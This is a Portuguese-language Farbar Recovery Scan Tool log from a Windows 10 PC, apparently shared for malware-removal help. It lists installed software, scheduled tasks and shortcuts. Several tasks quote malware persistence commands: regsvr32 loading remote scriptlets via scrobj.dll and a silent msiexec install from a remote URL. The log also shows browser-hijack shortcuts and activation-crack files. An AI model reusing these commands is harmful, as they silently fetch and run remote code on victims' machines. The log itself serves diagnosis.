Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 23-04-2017 01
Executado por ADEMIR MONTEIRO (25-04-2017 18:25:51)
Executando a partir de C:\Users\ADEMIR MONTEIRO\Downloads
Windows 10 Home Single Language Versão 1607 (X64) (2016-10-22 16:38:13)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
ADEMIR MONTEIRO (S-1-5-21-1492537628-2073842835-3753687853-1001 - Administrator - Enabled) => C:\Users\ADEMIR MONTEIRO
Administrador (S-1-5-21-1492537628-2073842835-3753687853-500 - Administrator - Disabled)
Convidado (S-1-5-21-1492537628-2073842835-3753687853-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1492537628-2073842835-3753687853-503 - Limited - Disabled)
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Apple Mobile Device Support (HKLM\...\{DB18F1C0-846F-46F5-A074-5B97C8AF5C8E}) (Version: 10.3.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17364 - Microsoft Corporation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (HKLM-x32\...\InstallShield_{6734CA10-8FB8-4C7F-B8C7-75317C617DC5}) (Version: 1.00.0000 - Activision)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (x32 Version: 1.00.0000 - Activision) Hidden
Chromium (HKLM-x32\...\{1D62F5A2-4DE2-2422-FC62-54A22CE28722}) (Version: - )
Citrix Online Launcher (HKLM-x32\...\{6740FE60-43C1-4D15-8C4A-001624134B14}) (Version: 1.0.312 - Citrix)
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 11.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.1.70 - Dell Inc.)
Dell Data Vault (Version: 4.2.2.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.212 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{287348C8-8B47-4C36-AF28-441A3B7D8722}) (Version: 1.0.3.60494 - Dell)
Dell System Detect (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.4 - Synaptics Incorporated)
Dell Update - SupportAssist Update Plugin (HKLM\...\{5F641343-FA40-4084-855A-7FA3251783DC}) (Version: 2.0.2.1840 - Dell Inc.)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
EPSON L555 Series Printer Uninstall (HKLM\...\EPSON L555 Series) (Version: - SEIKO EPSON Corporation)
Euro Truck Simulator 2 (HKLM-x32\...\{1B705E8F-9893-4486-B5D7-4F7FEB9C871E}_is1) (Version: 1.12.1 - SCS Software)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.3.0.1121 - Citrix Online, a division of Citrix Systems, Inc.)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{164600BE-9CEC-44E6-9B38-2B12D5FE2342}) (Version: 12.6.0.100 - Apple Inc.)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft Office 365 Home Premium - pt-br (HKLM\...\O365HomePremRetail - pt-br) (Version: 15.0.4551.1512 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pt-BR)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Need for Speed™ Most Wanted PC Demo (HKLM-x32\...\{E085FD28-F22C-4D41-00A1-F0751BF8EFC1}) (Version: - )
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{847C6940-D852-11E2-81D2-F04DA23A5C58}) (Version: 2.0.596 - Sony)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Sawbuck (HKLM-x32\...\{459BFE07-FCF3-4274-AC8B-8E8DDA7214BA}) (Version: 0.6.8.0 - Google Inc)
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{CD62BCB9-02D2-443F-AC7A-443377DA5B38}) (Version: 7.31.0.56 - Skype Technologies S.A.)
Skype™ 7.32 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
Software de dispositivo do Chipset Intel® (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden
SpinTires Tech Demo (June 060613) (HKLM-x32\...\{9AF7D6F5-50A5-432C-9F7B-83BCE03B11A0}) (Version: 1.3 - Oovee)
Spotify (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Spotify) (Version: 1.0.49.125.g72ee7853 - Spotify AB)
Suporte para Aplicativos Apple (32-bit) (HKLM-x32\...\{05E07D23-91E9-4E70-A4CC-EF505088F967}) (Version: 5.4.1 - Apple Inc.)
Suporte para Aplicativos Apple Apple (64-bit) (HKLM\...\{741291DA-2B34-4D44-8FB6-58EDE21261D8}) (Version: 5.4.1 - Apple Inc.)
The Desktop Weather 2.0.1.11389 (HKLM\...\WeatherTool) (Version: 2.0.1.11389 - ShenZhen Enode Techology co,.Ltd) <==== ATENÇÃO
Unity Web Player (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\UnityWebPlayer) (Version: 5.0.1f1 - Unity Technologies ApS)
VDownloader 4.5.2737 (HKLM\...\{A7E19604-93AF-4611-8C9F-CE509C2B286E}_is1) (Version: - Vitzo Limited)
vSnapshot 1.0.0.0 (HKLM\...\{F772C08D-9F61-45c6-982F-ADDEEE0D92C6}) (Version: 1.0.0.0 - ShenZhen Zhihuimen Techology co,.Ltd)
Warsaw 1.3.1 (HKLM-x32\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.3.1 - GAS Tecnologia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{A62E09B4-6467-4E0F-9B52-E61D8BC9FC69}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{E5A7A7B5-9D06-4DBE-BAC0-04B69FF070B5}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayActiveX-x64.dll (Skype Technologies S.A.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {080BBA44-FD00-4236-B483-8B666C925A4A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\mrt.exe [2017-04-12] (Microsoft Corporation)
Task: {0F373340-7552-468F-805A-12372F3EBBA3} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} - System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/go/help.faq.installer?LastError=1603
Task: {1C13CF54-132B-47A3-A9C3-46781DDE17AA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} - \Microsoft\Windows\Setup\gwx\rundetector -> Nenhum Arquivo <==== ATENÇÃO
Task: {1FF36D07-1A84-4C32-9B78-1878EE9019A1} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATENÇÃO
Task: {21ECBBF7-3B97-4D47-8369-A2079A2A349E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe [2013-10-31] (Microsoft Corporation)
Task: {25AF1857-93F1-41E3-95BA-7EE079948513} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {32EB37C5-14B2-4DC8-9256-34ABAB7F2001} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {3BB11FEE-9805-4E4C-A070-61E59461E07C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-15] (Adobe Systems Incorporated)
Task: {4325960B-88DF-4761-8F01-6B20997ABD54} - System32\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873} => C:\Program Files (x86)\tools\update\tools_update.exe [2016-07-04] ()
Task: {4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} - System32\Tasks\R@1n-KMS\Office14ProPlus => wmic
Task: {4DCED5E7-C4D2-48E0-9465-4A9A58089B29} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {5280B2E7-F127-40B0-AF3E-0A0674B4F874} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {595301D0-FBBC-4290-BD07-916D382DF13C} - System32\Tasks\{AD415D48-A269-4E70-981F-C480E2FD8AA6} => pcalua.exe -a "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\do-search\UninstallManager.exe" -c -ptid=cor
Task: {599945A8-13E2-4CE3-9C9D-B497F82365B1} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {634C2AFE-2840-4A2B-AF69-81BCE86DD08E} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\ADEMIR MONTEIRO\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {748A26FA-AC85-48B7-BDE5-889E02F6BB61} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2015-04-10] (Dell Inc.)
Task: {77706C8A-94AF-4E57-B8E2-03CF78500731} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {7791C1D9-4C84-4119-B684-5B3BC288C976} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2017-02-14] (Apple Inc.)
Task: {7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {8186247E-67E3-4CF6-B37C-85542BFB8F52} - System32\Tasks\googleupdatetaskmachineua => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {84A4D586-F069-481B-8AC3-656EF9F0018C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {8DC21957-9D43-435F-A928-0AC2F312D7CE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {A0E0CF38-7693-4DCA-A502-A10561BF1C86} - System32\Tasks\googleupdatetaskmachinecore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {B682F9E1-06F9-433A-803D-072B9B9DB540} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {BDC4343F-A3A4-4507-8745-3FF497B5BDCA} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {BDDAE168-8F9C-4633-9A54-4728F4CFB574} - System32\Tasks\{8BA06421-6163-42DE-B7C9-7F08ADA59627} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/abandoninstall?page=tsProgressBar
Task: {C1AC93B9-454A-437E-9027-1A2004FA261D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Nenhum Arquivo <==== ATENÇÃO
Task: {C4FA5E11-2718-4ACA-ABD8-7FDF57BD96B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {C6392B5A-3A2E-4477-B098-2CA65E62ACE6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {CC21D6E8-24A8-4ABE-8FEB-697524D453D0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {CD7FFAF9-0423-42E9-A52D-5840EDA92753} - \BackgroundContainer Startup Task -> Nenhum Arquivo <==== ATENÇÃO
Task: {D20A4A65-00F9-43FD-9664-28FF8CFE3DFE} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {E040132B-4205-44A1-86B0-3EDAC6A6F355} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-01-15] (Microsoft Corporation)
Task: {E0A2BEA2-67D5-468B-87FB-8A28DC93D858} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {F961350E-3BDD-4EB4-9FDA-1DE60446BA52} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} - \WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\Dell SupportAssistAgent AutoUpdate.job => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873}.job => C:\Program Files (x86)\tools\update\tools_update.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001
==================== Módulos Carregados (Whitelisted) ==============
2017-01-13 13:56 - 2017-01-13 13:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2017-03-16 16:08 - 2017-03-16 16:08 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00152264 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\vSnapshotServ.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00026112 _____ () C:\Windows\KMS-R@1n.exe
2013-12-03 15:35 - 2013-08-23 14:45 - 00379560 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2rui.dll
2013-12-03 15:35 - 2013-10-31 09:08 - 00520872 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2r64.dll
2013-12-03 15:35 - 2013-10-31 09:07 - 00618152 _____ () C:\Program Files\Microsoft Office 15\ClientX64\StreamServer.dll
2016-05-30 03:24 - 2016-05-30 03:24 - 00150640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherService.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00005120 _____ () C:\WINDOWS\KMS-R@1nHook.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00004096 _____ () C:\WINDOWS\KMS-R@1nHook.dll
2017-04-17 19:19 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
